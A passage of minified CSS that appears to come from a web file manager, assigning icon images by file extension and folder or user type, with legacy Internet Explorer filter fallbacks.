\9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/prproj.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/prproj.png?ver=3.30',sizingMethod='scale');}.x-ps1{background-image:url("../../../images/file_icon/icon_file/ps1.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/ps1.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/ps1.png?ver=3.30',sizingMethod='scale');}.x-psd{background-image:url("../../../images/file_icon/icon_file/psd.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/psd.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/psd.png?ver=3.30',sizingMethod='scale');}.x-pspimage{background-image:url("../../../images/file_icon/icon_file/pspimage.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/pspimage.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/pspimage.png?ver=3.30',sizingMethod='scale');}.x-pst{background-image:url("../../../images/file_icon/icon_file/pst.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/pst.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/pst.png?ver=3.30',sizingMethod='scale');}.x-pub{background-image:url("../../../images/file_icon/icon_file/pub.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/pub.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/pub.png?ver=3.30',sizingMethod='scale');}.x-py{background-image:url("../../../images/file_icon/icon_file/py.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/py.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/py.png?ver=3.30',sizingMethod='scale');}.x-rar{background-image:url("../../../images/file_icon/icon_file/rar.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/rar.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/rar.png?ver=3.30',sizingMethod='scale');}.x-rb{background-image:url("../../../images/file_icon/icon_file/rb.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/rb.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/rb.png?ver=3.30',sizingMethod='scale');}.x-reg{background-image:url("../../../images/file_icon/icon_file/reg.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/reg.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/reg.png?ver=3.30',sizingMethod='scale');}.x-resx{background-image:url("../../../images/file_icon/icon_file/resx.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/resx.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/resx.png?ver=3.30',sizingMethod='scale');}.x-rtf{background-image:url("../../../images/file_icon/icon_file/rtf.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/rtf.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/rtf.png?ver=3.30',sizingMethod='scale');}.x-sitx{background-image:url("../../../images/file_icon/icon_file/sitx.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/sitx.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/sitx.png?ver=3.30',sizingMethod='scale');}.x-sln{background-image:url("../../../images/file_icon/icon_file/sln.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/sln.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/sln.png?ver=3.30',sizingMethod='scale');}.x-sql{background-image:url("../../../images/file_icon/icon_file/sql.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/sql.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/sql.png?ver=3.30',sizingMethod='scale');}.x-suo{background-image:url("../../../images/file_icon/icon_file/suo.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/suo.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/suo.png?ver=3.30',sizingMethod='scale');}.x-svg{background-image:url("../../../images/file_icon/icon_file/svg.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/svg.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/svg.png?ver=3.30',sizingMethod='scale');}.x-swf{background-image:url("../../../images/file_icon/icon_file/swf.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/swf.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/swf.png?ver=3.30',sizingMethod='scale');}.x-tar{background-image:url("../../../images/file_icon/icon_file/tar.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/tar.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/tar.png?ver=3.30',sizingMethod='scale');}.x-tga{background-image:url("../../../images/file_icon/icon_file/tga.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/tga.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/tga.png?ver=3.30',sizingMethod='scale');}.x-tgz{background-image:url("../../../images/file_icon/icon_file/tgz.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/tgz.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/tgz.png?ver=3.30',sizingMethod='scale');}.x-txt{background-image:url("../../../images/file_icon/icon_file/txt.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/txt.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/txt.png?ver=3.30',sizingMethod='scale');}.x-vb{background-image:url("../../../images/file_icon/icon_file/vb.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/vb.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/vb.png?ver=3.30',sizingMethod='scale');}.x-vbproj{background-image:url("../../../images/file_icon/icon_file/vbproj.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/vbproj.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/vbproj.png?ver=3.30',sizingMethod='scale');}.x-vbs{background-image:url("../../../images/file_icon/icon_file/vbs.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/vbs.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/vbs.png?ver=3.30',sizingMethod='scale');}.x-vcf{background-image:url("../../../images/file_icon/icon_file/vcf.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/vcf.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/vcf.png?ver=3.30',sizingMethod='scale');}.x-vcproj{background-image:url("../../../images/file_icon/icon_file/vcproj.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/vcproj.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/vcproj.png?ver=3.30',sizingMethod='scale');}.x-vcxproj{background-image:url("../../../images/file_icon/icon_file/vcxproj.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/vcxproj.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/vcxproj.png?ver=3.30',sizingMethod='scale');}.x-vdw{background-image:url("../../../images/file_icon/icon_file/vdw.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/vdw.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/vdw.png?ver=3.30',sizingMethod='scale');}.x-vdx{background-image:url("../../../images/file_icon/icon_file/vdx.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/vdx.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/vdx.png?ver=3.30',sizingMethod='scale');}.x-vsd{background-image:url("../../../images/file_icon/icon_file/vsd.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/vsd.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/vsd.png?ver=3.30',sizingMethod='scale');}.x-vsdx{background-image:url("../../../images/file_icon/icon_file/vsdx.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/vsdx.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/vsdx.png?ver=3.30',sizingMethod='scale');}.x-vss{background-image:url("../../../images/file_icon/icon_file/vss.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/vss.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/vss.png?ver=3.30',sizingMethod='scale');}.x-vst{background-image:url("../../../images/file_icon/icon_file/vst.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/vst.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/vst.png?ver=3.30',sizingMethod='scale');}.x-vsx{background-image:url("../../../images/file_icon/icon_file/vsx.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/vsx.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/vsx.png?ver=3.30',sizingMethod='scale');}.x-vtx{background-image:url("../../../images/file_icon/icon_file/vtx.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/vtx.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/vtx.png?ver=3.30',sizingMethod='scale');}.x-xaml{background-image:url("../../../images/file_icon/icon_file/xaml.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/xaml.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/xaml.png?ver=3.30',sizingMethod='scale');}.x-xap{background-image:url("../../../images/file_icon/icon_file/xap.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/xap.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/xap.png?ver=3.30',sizingMethod='scale');}.x-xls{background-image:url("../../../images/file_icon/icon_file/xls.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/xls.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/xls.png?ver=3.30',sizingMethod='scale');}.x-xlsb{background-image:url("../../../images/file_icon/icon_file/xlsb.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/xlsb.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/xlsb.png?ver=3.30',sizingMethod='scale');}.x-xlsm{background-image:url("../../../images/file_icon/icon_file/xlsm.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/xlsm.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/xlsm.png?ver=3.30',sizingMethod='scale');}.x-xlsx{background-image:url("../../../images/file_icon/icon_file/xlsx.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/xlsx.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/xlsx.png?ver=3.30',sizingMethod='scale');}.x-xlt{background-image:url("../../../images/file_icon/icon_file/xlt.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/xlt.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/xlt.png?ver=3.30',sizingMethod='scale');}.x-xltx{background-image:url("../../../images/file_icon/icon_file/xltx.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/xltx.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/xltx.png?ver=3.30',sizingMethod='scale');}.x-xml{background-image:url("../../../images/file_icon/icon_file/xml.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/xml.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/xml.png?ver=3.30',sizingMethod='scale');}.x-xps{background-image:url("../../../images/file_icon/icon_file/xps.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/xps.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/xps.png?ver=3.30',sizingMethod='scale');}.x-xsd{background-image:url("../../../images/file_icon/icon_file/xsd.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/xsd.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/xsd.png?ver=3.30',sizingMethod='scale');}.x-xsl{background-image:url("../../../images/file_icon/icon_file/xsl.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/xsl.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/xsl.png?ver=3.30',sizingMethod='scale');}.x-y{background-image:url("../../../images/file_icon/icon_file/y.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/y.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/y.png?ver=3.30',sizingMethod='scale');}.x-zip{background-image:url("../../../images/file_icon/icon_file/zip.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/zip.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/zip.png?ver=3.30',sizingMethod='scale');}.x-3dm,.x-3ds,.x-asm,.x-cam360,.x-catpart,.x-catproduct,.x-cgr,.x-collaboration,.x-dae,.x-dgn,.x-dlv3,.x-dwf,.x-dwfx,.x-dwg,.x-dwt,.x-dxf,.x-exp,.x-f3d,.x-fbx,.x-g,.x-gbxml,.x-iam,.x-idw,.x-ifc,.x-ige,.x-iges,.x-igs,.x-ipt,.x-jt,.x-model,.x-neu,.x-nwc,.x-nwd,.x-obj,.x-prt,.x-rvt,.x-sab,.x-sat,.x-session,.x-skp,.x-sldasm,.x-sldprt,.x-smb,.x-smt,.x-ste,.x-step,.x-stl,.x-stla,.x-stlb,.x-stp,.x-wire,.x-x_b,.x-x_t,.x-xas,.x-xpr{background-image:url("../../../images/file_icon/icon_file/autodesk/autodesk.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/autodesk/autodesk.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/autodesk/autodesk.png?ver=3.30',sizingMethod='scale');}.x-3ds{background-image:url("../../../images/file_icon/icon_file/autodesk/3ds.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/autodesk/3ds.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/autodesk/3ds.png?ver=3.30',sizingMethod='scale');}.x-3dm{background-image:url("../../../images/file_icon/icon_file/autodesk/3dm.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/autodesk/3dm.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/autodesk/3dm.png?ver=3.30',sizingMethod='scale');}.x-dae{background-image:url("../../../images/file_icon/icon_file/autodesk/dae.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/autodesk/dae.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/autodesk/dae.png?ver=3.30',sizingMethod='scale');}.x-stl,.x-stla,.x-stlb{background-image:url("../../../images/file_icon/icon_file/autodesk/stl.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/autodesk/stl.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/autodesk/stl.png?ver=3.30',sizingMethod='scale');}.x-dwg{background-image:url("../../../images/file_icon/icon_file/autodesk/dwg.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/autodesk/dwg.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/autodesk/dwg.png?ver=3.30',sizingMethod='scale');}.x-dwf{background-image:url("../../../images/file_icon/icon_file/autodesk/dwf.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/autodesk/dwf.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/autodesk/dwf.png?ver=3.30',sizingMethod='scale');}.x-dwfx{background-image:url("../../../images/file_icon/icon_file/autodesk/dwf.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/autodesk/dwf.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/autodesk/dwf.png?ver=3.30',sizingMethod='scale');}.x-dxf{background-image:url("../../../images/file_icon/icon_file/autodesk/dxf.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/autodesk/dxf.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/autodesk/dxf.png?ver=3.30',sizingMethod='scale');}.x-ifc{background-image:url("../../../images/file_icon/icon_file/autodesk/ifc.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/autodesk/ifc.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/autodesk/ifc.png?ver=3.30',sizingMethod='scale');}.x-iam{background-image:url("../../../images/file_icon/icon_file/autodesk/iam.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/autodesk/iam.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/autodesk/iam.png?ver=3.30',sizingMethod='scale');}.x-fbx{background-image:url("../../../images/file_icon/icon_file/autodesk/fbx.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/autodesk/fbx.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/autodesk/fbx.png?ver=3.30',sizingMethod='scale');}.x-rvt{background-image:url("../../../images/file_icon/icon_file/autodesk/rvt.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/autodesk/rvt.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/autodesk/rvt.png?ver=3.30',sizingMethod='scale');}.x-skp{background-image:url("../../../images/file_icon/icon_file/autodesk/skp.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/autodesk/skp.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/autodesk/skp.png?ver=3.30',sizingMethod='scale');}.x-vnd,.x-dgn{background-image:url("../../../images/file_icon/icon_file/autodesk/vnd-dgn.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/autodesk/vnd-dgn.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/autodesk/vnd-dgn.png?ver=3.30',sizingMethod='scale');}.x-folder{background-image:url("../../../images/file_icon/icon_others/folder.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/folder.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/folder.png?ver=3.30',sizingMethod='scale');}.x-folder-share{background-image:url("../../../images/file_icon/icon_others/folder_public.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/folder_public.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/folder_public.png?ver=3.30',sizingMethod='scale');}.x-recycle{background-image:url("../../../images/file_icon/icon_others/recycle.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/recycle.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/recycle.png?ver=3.30',sizingMethod='scale');}.x-recycle-full{background-image:url("../../../images/file_icon/icon_others/recycle_full.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/recycle_full.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/recycle_full.png?ver=3.30',sizingMethod='scale');}.x-path-self-share{background-image:url("../../../images/file_icon/icon_others/path_self_public.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/path_self_public.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/path_self_public.png?ver=3.30',sizingMethod='scale');}.x-app-link{background-image:url("../../../images/file_icon/icon_others/app_link.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/app_link.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/app_link.png?ver=3.30',sizingMethod='scale');}.x-user{background-image:url("../../../images/file_icon/icon_others/user.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/user.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/user.png?ver=3.30',sizingMethod='scale');}.x-user-self{background-image:url("../../../images/file_icon/icon_others/userSelf.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/userSelf.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/userSelf.png?ver=3.30',sizingMethod='scale');}.x-share{background-image:url("../../../images/file_icon/icon_others/share.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/share.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/share.png?ver=3.30',sizingMethod='scale');}.x-group-self{background-image:url("../../../images/file_icon/icon_others/groupSelf.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/groupSelf.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/groupSelf.png?ver=3.30',sizingMethod='scale');}.x-group-self-owner{background-image:url("../../../images/file_icon/icon_others/groupSelfOwner.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/groupSelfOwner.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/groupSelfOwner.png?ver=3.30',sizingMethod='scale');}.x-group-guest{background-image:url("../../../images/file_icon/icon_others/groupGuest.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/groupGuest.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/groupGuest.png?ver=3.30',sizingMethod='scale');}.x-group-self-root{background-image:url("../../../images/file_icon/icon_others/groupSelfRoot.png");background-image:none 